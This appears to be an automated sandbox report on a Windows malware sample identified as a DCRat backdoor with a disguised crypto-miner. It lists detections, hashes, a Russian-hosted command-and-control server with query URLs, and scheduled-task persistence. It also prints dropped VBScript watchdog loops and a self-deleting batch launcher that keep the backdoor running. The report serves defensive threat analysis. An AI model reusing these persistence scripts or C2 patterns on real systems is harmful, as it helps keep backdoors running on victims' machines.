            C:\msPortRefnetdhcp\componentWininto.exe | 100% | Avira | HEUR/AGEN.1323984 |
            C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe | 100% | Avira | VBS/Runner.VPG |
            C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs | 100% | Avira | VBS/Starter.VPVT |
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe | 100% | Avira | VBS/Runner.VPG |
            C:\Recovery\zufsVvjyWcGfJF.exe | 100% | Joe Sandbox ML | |
            C:\Recovery\zufsVvjyWcGfJF.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe | 100% | Joe Sandbox ML | |
            C:\Users\Default\Downloads\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
            C:\msPortRefnetdhcp\componentWininto.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe | 100% | Joe Sandbox ML | |
            C:\Recovery\zufsVvjyWcGfJF.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
            C:\Recovery\zufsVvjyWcGfJF.exe | 65% | Virustotal | | Browse
            C:\Users\Default\Downloads\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
            C:\Users\Default\Downloads\WmiPrvSE.exe | 65% | Virustotal | | Browse
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe | 96% | ReversingLabs | Win32.Trojan.DisguisedXMRigMiner |
            C:\Users\user\AppData\Local\Temp\ yberLoad.exe | 86% | Virustotal | | Browse
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby |
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe | 61% | Virustotal | | Browse
            C:\Users\user\AppData\Local\Temp\MVPLoader.exe | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MVPLoader.exe | 1% | Virustotal | | Browse
            C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
            C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe | 65% | Virustotal | | Browse
            C:\msPortRefnetdhcp\componentWininto.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
            C:\msPortRefnetdhcp\componentWininto.exe | 65% | Virustotal | | Browse
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://index.from.sh/pages/game.html | 0% | Avira URL Cloud | safe |
            http://a0947291.xsph.ruPo | 0% | Avira URL Cloud | safe |
            https://index.from.sh/pages/game.html | 0% | Virustotal | | Browse
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            a0947291.xsph.ru | 141.8.194.74 | true | false | | high
                                        high
                                        http://a0947291.xsph.ruPoWmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://a0947291.xsph.ru/WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://a0947291.xsph.ru/1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zpWmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecomponentWininto.exe, 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.000000000288B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://a0947291.xsph.ru/1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3726045478.000000001BA53000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                 IP | Domain | Country | ASN | ASN Name | Malicious
                                                 141.8.194.74 | a0947291.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1431492
                                                Start date and time:2024-04-25 10:16:09 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 13m 54s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:45
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:4c6fK85tK7.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:68DFE1E08B8CC7D19FF72334FDD09DB8.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@60/26@1/1
                                                EGA Information:
                                                • Successful, ratio: 10%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target MVPLoader.exe, PID 6768 because there are no executed function
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 2992 because it is empty
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 4076 because it is empty
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 6112 because it is empty
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 8044 because it is empty
                                                • Execution Graph export aborted for target componentWininto.exe, PID 7352 because it is empty
                                                • Execution Graph export aborted for target zufsVvjyWcGfJF.exe, PID 7896 because it is empty
                                                • Execution Graph export aborted for target zufsVvjyWcGfJF.exe, PID 8088 because it is empty
                                                • Execution Graph export aborted for target zufsVvjyWcGfJF.exe, PID 8120 because it is empty
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                 Time | Type | Description
                                                 09:17:06 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                 09:17:06 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                 09:17:07 | Task Scheduler | Run new task: zufsVvjyWcGfJF path: "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
                                                 09:17:07 | Task Scheduler | Run new task: zufsVvjyWcGfJFz path: "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
                                                 10:18:50 | API Interceptor | 22x Sleep call for process: WmiPrvSE.exe modified
                                                 Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                 141.8.194.74 | UYUuh7vsdN.exe | malicious | Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar | a0891666.xsph.ru/setup.exe
                                                 141.8.194.74 | PO_75826.doc | malicious | Unknown | a0857009.xsph.ru/macrisan2.1.exe
                                                 141.8.194.74 | Order_PO_001498.doc | malicious | AgentTesla, NSISDropper | a0857009.xsph.ru/csDacTFVcVlight.exe
                                                 141.8.194.74 | QQhgg2sQI1.exe | malicious | Unknown | a0621298.xsph.ru/advert.msi
                                                 141.8.194.74 | sT4cF8rUxp.exe | malicious | Unknown | a0621298.xsph.ru/443.exe
                                                 141.8.194.74 | Za35fCUFau.exe | malicious | Unknown | a0621298.xsph.ru/RM.exe
                                                 141.8.194.74 | eIxMVDoQF3.exe | malicious | Amadey RedLine SmokeLoader Tofsee Vidar | a0621298.xsph.ru/7.exe
                                                 141.8.194.74 | lEsEX3McwH.exe | malicious | BitCoin Miner RedLine | a0575239.xsph.ru/133722.exe
                                                No context
                                                 Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                 SPRINTHOSTRU | bquMe2ZSfj.exe | malicious | DCRat | 141.8.192.217
                                                 SPRINTHOSTRU | lq0xQckZHP.exe | malicious | DCRat | 141.8.192.217
                                                 SPRINTHOSTRU | 8783013BDBB0B9D9093B06792388A23ADF9E6A2A1749B.exe | malicious | DCRat | 141.8.192.26
                                                 SPRINTHOSTRU | joPS73cEOb.exe | malicious | DCRat | 141.8.192.217
                                                 SPRINTHOSTRU | 8KT3wKvQeO.exe | malicious | DCRat | 141.8.192.217
                                                 SPRINTHOSTRU | BoTl06PDGl.exe | malicious | FormBook | 141.8.192.98
                                                 SPRINTHOSTRU | 9qjY1U1ssF.exe | malicious | DCRat | 141.8.194.74
                                                 SPRINTHOSTRU | Ryf8vHLcLt.exe | malicious | DCRat | 141.8.194.149
                                                 SPRINTHOSTRU | 8icsOoCU5T.exe | malicious | DCRat | 141.8.194.74
                                                 SPRINTHOSTRU | 17j4ljcI3U.exe | malicious | DCRat | 141.8.192.126
                                                No context
                                                No context
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):234
                                                Entropy (8bit):5.773480710999957
                                                Encrypted:false
                                                SSDEEP:6:c8ZCqRqqV7I3fkSUUES87ZPnO1lRTupwFgikAPD7:cNG3V7KTmSgZPa3J7
                                                MD5:433CA2E4B83496CE9C5270BF160C2F42
                                                SHA1:91410D93A34EDF940BCC1BB3FFF6B4F1C1CEDEEF
                                                SHA-256:1098CCEF7B1F8602525A8DCAF18EE98D2CB2E39553D7C4D8DA8FCAFB38A92194
                                                SHA-512:5741A785EB9B6ABAA753437A0E34FDCD706703CB17665A5E1605DAB0F4061398E6238629C9F34240A0C7695507CDE7E8F13FFECCEED66C5819AEDEA518F3A567
                                                Malicious:false
                                                Preview:yamkkAPN8sQpuw9y7LwsUAoJgI3DuPWYEBd9iqwhahuYytRqpXWVqr3ywcDbHMdsV2ktTAQRYPRwQPUw1MYW2BrWHpMFmVZOEBD6JiXoHF7baGhhHRk5xHzUKNlnxKpDzCsPMYnSytPxDQ6BHp7Vuea7Lsw57t16Z4lXXSVtnSGE2CQ4RjfINUSVmvDdlrUF2SXJoinzUNrcXWEJc2oXNstFlQvmO1I67BMjoHPs6q
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6......>.6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text...D.5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......&6.............@..@.reloc........6......*6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with very long lines (562), with no line terminators
                                                Category:dropped
                                                Size (bytes):562
                                                Entropy (8bit):5.8952955621465115
                                                Encrypted:false
                                                SSDEEP:12:WH93O0SwsHzjrBZUHYHoDx9tw/DCMIpatw925qFgfRyz:u93oTjVZuaoDJw/DCJOl5q2Zu
                                                MD5:C78955BB81189C5B3B0DAAE326638B8A
                                                SHA1:ABE3B17F418629B7CFAB1F62540BCE69AF656860
                                                SHA-256:CA18B092CF8C5569B8AE8D8C2BF9AD66C0C48862720FF258501BC7E0721F7AED
                                                SHA-512:B193F2B0E4811563FF82F04AB1292716E23FD9BF3F4A7EC8F9215B2142927ED68858B4AAA7E9A818C0A9B7AD0124CB3379DB0BA44973028395C21BEE5A49E21B
                                                Malicious:false
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6......>.6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text...D.5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......&6.............@..@.reloc........6......*6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1915
                                                Entropy (8bit):5.363869398054153
                                                Encrypted:false
                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                                MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                                SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                                SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                                SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                Process:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):1281
                                                Entropy (8bit):5.370111951859942
                                                Encrypted:false
                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                Process:C:\Users\user\Desktop\4c6fK85tK7.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):4253696
                                                Entropy (8bit):7.610395400561869
                                                Encrypted:false
                                                SSDEEP:98304:TiJbE5xmRwLHVZCC55YkdOsfMvBh0ND4wELWg:TMaxAWHVkq5Y2fMkNDILWg
                                                MD5:A84070968353EDCC9559F54DEEDD8FE9
                                                SHA1:27187EA020C4FCFAD6783DEBBEA35883B1125538
                                                SHA-256:6B1FF20C95AB7EA0D16F441C6726F6112BBAE1C620696F2E9BEC01B4926DC1F4
                                                SHA-512:134A25E91D0B088A9DD57CE0310A1F164F6586624DD71A02001ECE26B70D3D8FD201ECE35B5A9B15764F983CBF9DA099B8F13B5E99584ADA093F12C506A2500E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 96%
                                                • Antivirus: Virustotal, Detection: 86%, Browse
                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................@...... .......0....@..........................`A..................@...........................P............@..................................................p......................................................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc.....@.......@.."..............@..P.....................$..............@..P........................................................................................................................................
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.226398779530761
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KajMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNiVC:9AnyHfCATajknpD/AEmHob/uhEjdxWgr
                                                MD5:20B995CA7B8EE8F7928A5460BEB10533
                                                SHA1:024EF18EB18D9A7587066EA0380E20EF3697EC11
                                                SHA-256:B0246676F82D8C226D4C77E7FABD5347D7D9ECA9C9763B3C10D08ED5BE6246B0
                                                SHA-512:69B654E5B8C1CAAF3AEC67C1471101DC397EA304C1CA0C3CBCDDBBA8B9866F0B8344823D20621AADBD7263971B4311167B4F84EA7A8408B67DF9171A513665B7
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "2992"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.233002789950433
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KNjMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNiVC:9AnyHfCATNjknpD/AEmHob/uhEjdxWgr
                                                MD5:C3A7078889A8BCF086DED2FFB05B9605
                                                SHA1:4903DD4B81BB8A53D4B13BADE13D6E6AC11A727A
                                                SHA-256:8A6DE3E07BEC1DC1AB6EC8DBB81820A1DE0DF1381A8C086FA63BB38C7D9BD064
                                                SHA-512:F6FC85E9059EF237DC45778EE238928A34C63214E79D3A389933A43EF469BA8CFB8EC07EDB4852CA573B9B955DA6BCFEADFA4B962741D6CDB1B7784577BC427A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "4076"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\user\AppData\Local\Temp\ yberLoad.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):3895538
                                                Entropy (8bit):7.720590977174146
                                                Encrypted:false
                                                SSDEEP:98304:rbE5xmRwLHVZCC55YkdOsfMvBh0ND4wELWU:raxAWHVkq5Y2fMkNDILWU
                                                MD5:1B4CF2A40E1387CF97DFBE1303C9619A
                                                SHA1:A3F98A0CA89495958F6171F775AA6B96BDF6E0DE
                                                SHA-256:6E7050BE5D9E4042BA632C228890329F41550608B6DE25094BDF5E4AE9448833
                                                SHA-512:A45B2066CC48CFAB284FD61AB5413BA0368BB457AF22425A8B469A83CA4FF75F3378B43DC6CE988CAAC98B8272333E31E590A3C2AE8A3FFD4B1FE9199F5B8400
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 70%
                                                • Antivirus: Virustotal, Detection: 61%, Browse
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):210
                                                Entropy (8bit):5.181066036181365
                                                Encrypted:false
                                                SSDEEP:6:hITg3Nou11r+DEiYlI8bKOZG1wkn23f04h:OTg9YDE1Nfzh
                                                MD5:9174B70734E64E173A51412257D73BA3
                                                SHA1:60884B87A52DEB43A68B26F94718FD4A77455B25
                                                SHA-256:67AB53B61184EB28BD26412CFBE610DB974A3E30C715D27B5B66D2685E46151A
                                                SHA-512:7C5A41EBF02C3D1ECE1EA4B92F442C4A5B7ECE077BE0246D0D8FF0191F9A6DA5F6551E548287D3542E7FCD571D22A2E88F40E9453BABBD716CE1C9CCE3E49D1B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\EunsIO9tk2.bat"
                                                Process:C:\Users\user\AppData\Local\Temp\ yberLoad.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):348160
                                                Entropy (8bit):5.241090292773825
                                                Encrypted:false
                                                SSDEEP:3072:Qu7FpkBe8jj1KINqaaKKI4AUsMxWm5SQ3j9Tput/Y0ldez0GM0W48:QSHkBTjZaKKI4AUsMxR/RgzlQ2t
                                                MD5:F1F43CF5A79E51BA13EF602B25C63A9E
                                                SHA1:DF986285C4E6F2355B0F528A13063F5D855A250C
                                                SHA-256:4DFF4A3558B40B19E961FC8ADC45E00B2B7DBD6EBABBC219D1446BC6CA5350E8
                                                SHA-512:6867D3D6D01A4A170E4D5AB9115408A97C7E5A00730632259D9AFAE7B688F214C455C014BDFF2FC90185DD92F96C06D0C13F39AB09535E1ADD9FB7EA49EC5384
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):25
                                                Entropy (8bit):4.323856189774723
                                                Encrypted:false
                                                SSDEEP:3:9hRxIpLpmUW:9uplmUW
                                                MD5:DD8B1FFDCB98B65E835046B571981510
                                                SHA1:593D886103D5BF275CD50306733842908B76751D
